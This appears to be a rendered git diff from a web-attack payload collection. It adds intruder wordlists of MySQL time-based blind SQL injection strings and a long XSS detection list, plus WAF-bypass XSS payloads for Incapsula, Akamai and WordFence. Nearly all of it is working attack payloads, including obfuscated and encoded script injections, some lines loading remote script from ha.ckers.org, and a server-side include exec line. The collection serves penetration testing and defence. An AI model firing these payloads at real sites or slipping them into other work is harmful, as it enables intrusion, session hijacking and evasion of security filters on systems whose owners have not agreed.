'),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
||||||
|
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
|
||||||
|
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
|
||||||
|
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23
|
45
SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE
Normal file
45
SQL injection/Intruders/payloads-sql-blind-MySQL-WHERE
Normal file
@ -0,0 +1,45 @@
|
|||||||
|
and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
' and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
' and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
' and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
" and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
" and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
" and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
)) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
)) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
)) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
))) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
)))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
)))) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
)))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
') and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
') and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
') and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
") and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
") and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
") and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
')) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
')) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
')) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
")) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
")) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
")) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
'))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
'))) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
'))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
"))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
"))) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
"))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
')))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
')))) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
')))) and 0=benchmark(3000000,MD5(1))%20%23
|
||||||
|
")))) and 0=benchmark(3000000,MD5(1))%20/*
|
||||||
|
")))) and 0=benchmark(3000000,MD5(1))%20--
|
||||||
|
")))) and 0=benchmark(3000000,MD5(1))%20%23
|
202
XSS injection/Intruders/XSSDetection.txt
Normal file
202
XSS injection/Intruders/XSSDetection.txt
Normal file
@ -0,0 +1,202 @@
|
|||||||
|
%3Cimg/src=%3Dx+onload=alert(2)%3D
|
||||||
|
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e
|
||||||
|
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000EB)%3C/script%3E
|
||||||
|
48e71%3balert(1)//503466e3
|
||||||
|
';confirm('XSS')//1491b2as
|
||||||
|
a29b1%3balert(888)//a62b7156d82
|
||||||
|
<scr	ipt>alert('XSS')</scr	ipt>
|
||||||
|
"onmouseover%3dprompt(941634)
|
||||||
|
%f6%22%20onmouseover%3dprompt(941634)%20
|
||||||
|
" onerror=alert()1 a="
|
||||||
|
style=xss:expression(alert(1))
|
||||||
|
<input type=text value=“XSS”>
|
||||||
|
A” autofocus onfocus=alert(“XSS”)//
|
||||||
|
<input type=text value=”A” autofocus onfocus=alert(“XSS”)//”>
|
||||||
|
<a href="javascript:alert(1)">ssss</a>
|
||||||
|
+ADw-p+AD4-Welcome to UTF-7!+ADw-+AC8-p+AD4-
|
||||||
|
+ADw-script+AD4-alert(+ACc-utf-7!+ACc-)+ADw-+AC8-script+AD4-
|
||||||
|
+ADw-script+AD4-alert(+ACc-xss+ACc-)+ADw-+AC8-script+AD4-
|
||||||
|
<%00script>alert(‘XSS’)<%00/script>
|
||||||
|
<%script>alert(‘XSS’)<%/script>
|
||||||
|
<%tag style=”xss:expression(alert(‘XSS’))”>
|
||||||
|
<%tag onmouseover="(alert('XSS'))"> is invalid. <%br />
|
||||||
|
</b style="expr/**/ession(alert('vulnerable'))">
|
||||||
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
||||||
|
'';!--"<XSS>=&{()}
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
||||||
|
<IMG SRC="javascript:alert('XSS');">
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||||
|
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
||||||
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||||
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC=javascript:alert('XSS')>
|
||||||
|
<IMG SRC="jav ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav	ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
<IMG SRC="jav
ascript:alert('XSS');">
|
||||||
|
<IMG SRC="  javascript:alert('XSS');">
|
||||||
|
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
||||||
|
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
||||||
|
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
||||||
|
<SCRIPT SRC=//ha.ckers.org/.j>
|
||||||
|
<iframe src=http://ha.ckers.org/scriptlet.html <
|
||||||
|
<IMG SRC="javascript:alert('XSS')"
|
||||||
|
<SCRIPT>a=/XSS/
|
||||||
|
alert(a.source)</SCRIPT>
|
||||||
|
\";alert('XSS');//
|
||||||
|
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
||||||
|
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
||||||
|
<BODY BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<BODY ONLOAD=alert('XSS')>
|
||||||
|
<IMG DYNSRC="javascript:alert('XSS')">
|
||||||
|
<IMG LOWSRC="javascript:alert('XSS')">
|
||||||
|
<BGSOUND SRC="javascript:alert('XSS');">
|
||||||
|
<BR SIZE="&{alert('XSS')}">
|
||||||
|
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
|
||||||
|
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
||||||
|
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
||||||
|
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
||||||
|
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
||||||
|
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
||||||
|
<XSS STYLE="behavior: url(xss.htc);">
|
||||||
|
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
|
||||||
|
<IMG SRC='vbscript:msgbox("XSS")'>
|
||||||
|
¼script¾alert(¢XSS¢)¼/script¾
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
||||||
|
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
||||||
|
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
||||||
|
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
||||||
|
<TABLE BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
||||||
|
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
||||||
|
<DIV STYLE="width: expression(alert('XSS'));">
|
||||||
|
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
||||||
|
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
||||||
|
<XSS STYLE="xss:expression(alert('XSS'))">
|
||||||
|
exp/*<A STYLE='no\xss:noxss("*//*");
|
||||||
|
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
||||||
|
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
||||||
|
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
||||||
|
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
||||||
|
<!--[if gte IE 4]>
|
||||||
|
<SCRIPT>alert('XSS');</SCRIPT>
|
||||||
|
<![endif]-->
|
||||||
|
<BASE HREF="javascript:alert('XSS');//">
|
||||||
|
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
||||||
|
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
||||||
|
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
||||||
|
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
|
||||||
|
a="get";
|
||||||
|
b="URL(\"";
|
||||||
|
c="javascript:";
|
||||||
|
d="alert('XSS');\")";
|
||||||
|
eval(a+b+c+d);
|
||||||
|
<HTML xmlns:xss>
|
||||||
|
<?import namespace="xss" implementation="http://ha.ckers.org/xss.htc">
|
||||||
|
<xss:xss>XSS</xss:xss>
|
||||||
|
</HTML>
|
||||||
|
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||||
|
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
|
||||||
|
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
|
||||||
|
<XML SRC="xsstest.xml" ID=I></XML>
|
||||||
|
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||||
|
<HTML><BODY>
|
||||||
|
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
|
||||||
|
<?import namespace="t" implementation="#default#time2">
|
||||||
|
<t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
|
||||||
|
</BODY></HTML>
|
||||||
|
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
||||||
|
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
||||||
|
<? echo('<SCR)';
|
||||||
|
echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
||||||
|
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
||||||
|
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
||||||
|
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
||||||
|
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
|
||||||
|
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
|
||||||
|
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
|
||||||
|
<
|
||||||
|
%3C
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
<
|
||||||
|
\x3c
|
||||||
|
\x3C
|
||||||
|
\u003c
|
||||||
|
\u003C
|
@ -754,12 +754,24 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
|
|||||||
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
|
||||||
```
|
```
|
||||||
|
|
||||||
### Akamai WAF bypass by @zseano - 18th june
|
### Incapsula WAF Bypass - 11th september
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
|
||||||
|
```
|
||||||
|
|
||||||
|
### Akamai WAF Bypass by @zseano - 18th june
|
||||||
|
|
||||||
```javascript
|
```javascript
|
||||||
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
?"></script><base%20c%3D=href%3Dhttps:\mysite>
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### WordFence WAF Bypass by @brutelogic - 12th september
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
<a href=javascript:alert(1)>
|
||||||
|
```
|
||||||
|
|
||||||
## More fun
|
## More fun
|
||||||
|
|
||||||
This section will be used for the "fun/interesting/useless" stuff.
|
This section will be used for the "fun/interesting/useless" stuff.
|
||||||
|
Loading…
Reference in New Issue
Block a user